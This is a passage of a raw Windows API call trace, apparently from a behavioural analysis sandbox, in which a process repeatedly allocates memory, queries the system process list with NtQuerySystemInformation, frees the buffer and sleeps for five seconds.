RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x550000, RegionSize=0xdea68*=0x10000) returned 0x0 [0157.182] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x550000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x550000, ResultLength=0x0) returned 0xc0000004 [0157.183] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x550000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0157.184] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x860000, RegionSize=0xdea54*=0x20000) returned 0x0 [0157.184] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x860000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x860000, ResultLength=0x0) returned 0x0 [0157.191] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x860000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0157.192] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0157.200] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x550000, RegionSize=0xdea68*=0x10000) returned 0x0 [0157.200] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x550000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x550000, ResultLength=0x0) returned 0xc0000004 [0157.203] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x550000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0157.203] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x860000, RegionSize=0xdea54*=0x20000) returned 0x0 [0157.203] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x860000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x860000, ResultLength=0x0) returned 0x0 [0157.208] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x860000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0157.208] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0157.215] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x550000, RegionSize=0xdea68*=0x10000) returned 0x0 [0157.216] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x550000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x550000, ResultLength=0x0) returned 0xc0000004 [0157.217] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x550000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0157.217] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x860000, RegionSize=0xdea54*=0x20000) returned 0x0 [0157.218] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x860000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x860000, ResultLength=0x0) returned 0x0 [0157.223] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x860000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0157.224] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0157.247] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x550000, RegionSize=0xdea68*=0x10000) returned 0x0 [0157.247] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x550000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x550000, ResultLength=0x0) returned 0xc0000004 [0157.248] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x550000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0157.248] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x860000, RegionSize=0xdea54*=0x20000) returned 0x0 [0157.249] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x860000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x860000, ResultLength=0x0) returned 0x0 [0157.252] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x860000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0157.253] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0157.298] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x550000, RegionSize=0xdea68*=0x10000) returned 0x0 [0157.299] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x550000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x550000, ResultLength=0x0) returned 0xc0000004 [0157.300] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x550000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0157.300] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x860000, RegionSize=0xdea54*=0x20000) returned 0x0 [0157.300] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x860000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x860000, ResultLength=0x0) returned 0x0 [0157.306] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x860000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0157.307] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0157.348] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x550000, RegionSize=0xdea68*=0x10000) returned 0x0 [0157.348] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x550000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x550000, ResultLength=0x0) returned 0xc0000004 [0157.351] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x550000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0157.352] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x860000, RegionSize=0xdea54*=0x20000) returned 0x0 [0157.352] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x860000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x860000, ResultLength=0x0) returned 0x0 [0157.435] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x860000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0157.435] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0157.505] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x550000, RegionSize=0xdea68*=0x10000) returned 0x0 [0157.505] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x550000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x550000, ResultLength=0x0) returned 0xc0000004 [0157.514] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x550000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0157.514] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x860000, RegionSize=0xdea54*=0x20000) returned 0x0 [0157.514] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x860000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x860000, ResultLength=0x0) returned 0x0 [0157.519] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x860000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0157.520] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0157.529] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x550000, RegionSize=0xdea68*=0x10000) returned 0x0 [0157.530] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x550000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x550000, ResultLength=0x0) returned 0xc0000004 [0157.531] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x550000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0157.531] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x860000, RegionSize=0xdea54*=0x20000) returned 0x0 [0157.531] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x860000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x860000, ResultLength=0x0) returned 0x0 [0157.550] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x860000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0157.551] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0157.557] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x550000, RegionSize=0xdea68*=0x10000) returned 0x0 [0157.557] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x550000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x550000, ResultLength=0x0) returned 0xc0000004 [0157.558] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x550000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0157.559] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x860000, RegionSize=0xdea54*=0x20000) returned 0x0 [0157.559] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x860000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x860000, ResultLength=0x0) returned 0x0 [0157.564] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x860000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0157.564] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0157.570] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x550000, RegionSize=0xdea68*=0x10000) returned 0x0 [0157.570] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x550000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x550000, ResultLength=0x0) returned 0xc0000004 [0157.571] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x550000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0157.572] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x860000, RegionSize=0xdea54*=0x20000) returned 0x0 [0157.572] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x860000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x860000, ResultLength=0x0) returned 0x0 [0157.590] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x860000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0157.591] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0157.614] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x550000, RegionSize=0xdea68*=0x10000) returned 0x0 [0157.614] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x550000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x550000, ResultLength=0x0) returned 0xc0000004 [0157.616] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x550000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0157.616] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x860000, RegionSize=0xdea54*=0x20000) returned 0x0 [0157.617] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x860000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x860000, ResultLength=0x0) returned 0x0 [0157.622] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x860000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0157.623] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0157.706] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x550000, RegionSize=0xdea68*=0x10000) returned 0x0 [0157.707] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x550000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x550000, ResultLength=0x0) returned 0xc0000004 [0157.709] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x550000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0157.709] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x860000, RegionSize=0xdea54*=0x20000) returned 0x0 [0157.709] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x860000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x860000, ResultLength=0x0) returned 0x0 [0157.714] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x860000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0157.714] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0157.993] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x550000, RegionSize=0xdea68*=0x10000) returned 0x0 [0157.994] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x550000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x550000, ResultLength=0x0) returned 0xc0000004 [0157.997] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x550000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0157.997] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x860000, RegionSize=0xdea54*=0x20000) returned 0x0 [0157.998] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x860000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x860000, ResultLength=0x0) returned 0x0 [0158.002] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x860000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0158.006] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0158.024] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x550000, RegionSize=0xdea68*=0x10000) returned 0x0 [0158.024] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x550000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x550000, ResultLength=0x0) returned 0xc0000004 [0158.026] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x550000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0158.026] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x860000, RegionSize=0xdea54*=0x20000) returned 0x0 [0158.027] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x860000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x860000, ResultLength=0x0) returned 0x0 [0158.030] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x860000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0158.031] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0158.040] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x550000, RegionSize=0xdea68*=0x10000) returned 0x0 [0158.040] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x550000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x550000, ResultLength=0x0) returned 0xc0000004 [0158.041] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x550000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0158.041] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x860000, RegionSize=0xdea54*=0x20000) returned 0x0 [0158.042] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x860000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x860000, ResultLength=0x0) returned 0x0 [0158.045] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x860000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0158.046] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0158.051] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x550000, RegionSize=0xdea68*=0x10000) returned 0x0 [0158.052] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x550000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x550000, ResultLength=0x0) returned 0xc0000004 [0158.053] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x550000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0158.053] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x860000, RegionSize=0xdea54*=0x20000) returned 0x0 [0158.053] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x860000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x860000, ResultLength=0x0) returned 0x0 [0158.088] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x860000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0158.089] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0158.092] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x550000, RegionSize=0xdea68*=0x10000) returned 0x0 [0158.093] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x550000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x550000, ResultLength=0x0) returned 0xc0000004 [0158.094] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x550000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0158.094] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x860000, RegionSize=0xdea54*=0x20000) returned 0x0 [0158.117] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x860000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x860000, ResultLength=0x0) returned 0x0 [0158.122] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x860000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0158.123] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0158.140] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x550000, RegionSize=0xdea68*=0x10000) returned 0x0 [0158.141] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x550000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x550000, ResultLength=0x0) returned 0xc0000004 [0158.142] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x550000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0158.142] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x860000, RegionSize=0xdea54*=0x20000) returned 0x0 [0158.143] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x860000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x860000, ResultLength=0x0) returned 0x0 [0158.147] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x860000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0158.148] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0158.162] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x550000, RegionSize=0xdea68*=0x10000) returned 0x0 [0158.163] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x550000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x550000, ResultLength=0x0) returned 0xc0000004 [0158.165] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x550000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0158.166] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x860000, RegionSize=0xdea54*=0x20000) returned 0x0 [0158.166] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x860000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x860000, ResultLength=0x0) returned 0x0 [0158.172] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x860000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0158.174] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0158.177] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x550000, RegionSize=0xdea68*=0x10000) returned 0x0 [0158.177] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x550000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x550000, ResultLength=0x0) returned 0xc0000004 [0158.178] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x550000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0158.179] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x860000, RegionSize=0xdea54*=0x20000) returned 0x0 [0158.179] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x860000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x860000, ResultLength=0x0) returned 0x0 [0158.185] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x860000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0158.186] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0158.189] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x550000, RegionSize=0xdea68*=0x10000) returned 0x0 [0158.190] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x550000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x550000, ResultLength=0x0) returned 0xc0000004 [0158.195] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x550000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0158.195] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x860000, RegionSize=0xdea54*=0x20000) returned 0x0 [0158.196] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x860000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x860000, ResultLength=0x0) returned 0x0 [0158.200] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x860000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0158.201] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0158.203] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x550000, RegionSize=0xdea68*=0x10000) returned 0x0 [0158.203] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x550000, 